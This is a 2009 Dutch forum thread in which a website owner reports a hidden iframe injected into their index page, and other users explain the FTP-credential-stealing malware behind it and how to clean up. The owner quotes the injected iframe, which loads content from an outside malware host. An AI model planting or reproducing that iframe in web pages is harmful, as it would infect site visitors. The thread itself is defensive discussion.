Vreemd virus op mijn website?

Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.

quote:

Op maandag 13 juli 2009 20:31 schreef Ezechielk het volgende:
Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.

lift

een verwijzing naar een andere site/bestand...

hoe dat komt? omdat je je beveiliging te laag hebt staan!

Er heeft waarschijnlijk ooit een virus of trojan op je computer gestaan (als ie er nog niet steeds op staat), die iframes automatisch wegschrijft naar alle bestanden waar HTML in zit. Als je zo'n html bestand vervolgens op je site zet zonder de source code te checken krijg je dit soort dingen.

Tip: alle html bestanden checken op iframes en die eruit gooien. (Gewoon alle code tussen/inclusief <iframe....></iframe>) Dan ook je computer scannen. Bij mij vind Avast! iig foute iframes.

Je kan dit al doen door via Windows te zoeken naar *.html, *.htm, *.php, *.asp bestanden die het woord 'iframe' bevatten, geloof ik.

Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...

Lekkere server als je ftp-gegevens gejat worden.

quote:

Op maandag 13 juli 2009 20:27 schreef FortunaHome het volgende:
Hallo,

Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:

<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>

Iemand enig idee wat de fuck dit is en hoe dat daar komt????

Kijk ook even of je site al op de zwarte lijst staat van Google. Gaat het eenvoudigst als je een site bezoekt met FireFox, je krijgt dan in plaats van de site in kwestie een rood waarschuwingsscherm te zien.

De laatste tijd zijn er veel besmette websites gesignaleerd. Dat werkt als volgt:

1. Iemand bezoekt een (bonafide) reeds besmette website, die de computer van de bezoeker infecteert.

2. Een stukje malware op de zojuist besmette computer gaat op zoek naar FTP inloggegevens. Worden deze gevonden, dan worden ze doorgegeven aan de maker (c.q. verspreider) van de malware.

3. De maker c.q. verspreider van de malware gebruikt de buitgemaakte inloggegevens om de betreffende websites aan te passen c.q. te infecteren met een stukje obfuscated javascript o.i.d.

4. Nietsvermoedende bezoekers blijven de voorheen als betrouwbaar bekend staande site bezoeken, waardoor ook hún computers worden geïnfecteerd.

5. Ga terug naar stap 1 om te lezen wat er nu weer met deze computers gebeurt ...

Op deze manier ontstaat dus een soort sneeuwbaleffect. Je moet in ieder geval de computer(s) die je hebt gebruikt voor het updaten van je site onderzoeken op malware, tenminste één hiervan is besmet. Je moet natuurlijk ook meteen het FTP wachtwoord dat je gebruikt om je site te updaten wijzigen, want je inloggegevens zijn immers gestolen. En je moet alle pagina's van je site nakijken. Als je al op de zwarte lijst van Google terecht bent gekomen, dan kun je na het opschonen een verzoek indienen om je site opnieuw te laten scannen. Wordt de site dan clean bevonden, dan wordt deze weer van de zwarte lijst gehaald.

Sterkte TS!

Heb een aantal weken geleden hetzelfde gehad.. 6 (!) van mijn sites waren geïnfecteerd. Scannen met ad-aware en nod32, alle ftp wachtwoorden wijzigen (van een aantal had ik geen plesk of root toegang, moest ik weer heen en weer bellen met de hoster) en je bestanden opnieuw uploaden does the trick.

Bij sommige sites heb ik 2 weken lang elke dag het html bestand moeten downloaden en de iframe moeten verwijderen, op een vast tijdstip (half 8 smorgens) werd het automatisch weer geplaatst door een of ander kutscript die de hackers gebruiken.. Verder herken je de hidden iframe's meestal vet snel omdat het heel je layout verneukt. Hadden ze beter anders kunnen doen met een hidden div maargoed, dood aan die kuthackers.

Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken .

Ook last van gehad. Bewijst maar weer hoe kut windows is.

quote:

Op maandag 13 juli 2009 21:16 schreef Adidah het volgende:
Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken .

Wat heeft dat er nu weer mee te maken?

quote:

Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:

[..]

Wat heeft dat er nu weer mee te maken?

Nou, wat denk je zelf?

quote:

Blijkbaar heb jij -of iemand gebruik makend maakt van jouw IP adres- zich niet aan de voorschriften van onze site gehouden.

Ben je het niet eens met deze beslissing, stuur dan een email naar webmaster@fortunahome.com.

Ik kom nooit op die site

quote:

Op maandag 13 juli 2009 21:19 schreef Adidah het volgende:

[..]

Nou, wat denk je zelf?

Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.

quote:

Op maandag 13 juli 2009 21:19 schreef Adidah het volgende:

[..]

Nou, wat denk je zelf?

Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten

quote:

Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:

[..]

Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.

Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...

quote:

Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:

[..]

Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.

quote:

Op maandag 13 juli 2009 22:24 schreef ukker het volgende:

[..]

Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten

quote:

Op maandag 13 juli 2009 22:25 schreef AquaMaryn het volgende:

[..]

Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...

Daarom moet je dus ook geen wachtwoorden laten onthouden . Als je wachtwoorden opslaat, maakt het qua beveiliging geen fuck meer uit of het om een werkstation of server gaat.

quote:

Op maandag 13 juli 2009 22:34 schreef Adidah het volgende:

[..]


[..]


[..]

Daarom moet je dus ook geen wachtwoorden laten onthouden .

I know, maar het is zo makkelijk!! Wachtwoorden van websites sla ik sowieso nooit op, maar aan FTP had ik eigenlijk nooit gedacht, dat zit ten slotte in een apart client... maar daar heb je dus ook niets aan.

quote:

Op maandag 13 juli 2009 @ 22:34 schreef Adidah het volgende:

[..]


[..]


[..]

Daarom moet je dus ook geen wachtwoorden laten onthouden . Als je wachtwoorden opslaat, maakt het qua beveiliging geen fuck meer uit of het om een werkstation of server gaat.

Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.

quote:

Op dinsdag 14 juli 2009 00:09 schreef doppendoosch het volgende:

[..]

Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.

Totdat slimme hackertjes die keyring weer weten te kraken...

quote:

Op dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.

Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.

Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten

Waarschijnlijk is het gewoon een scriptkiddy die zich even lekker aan het uitleven was. Beetje slim omgaan met je inloggegevens ljikt me ook wel het meest vanzelfsprekende imho.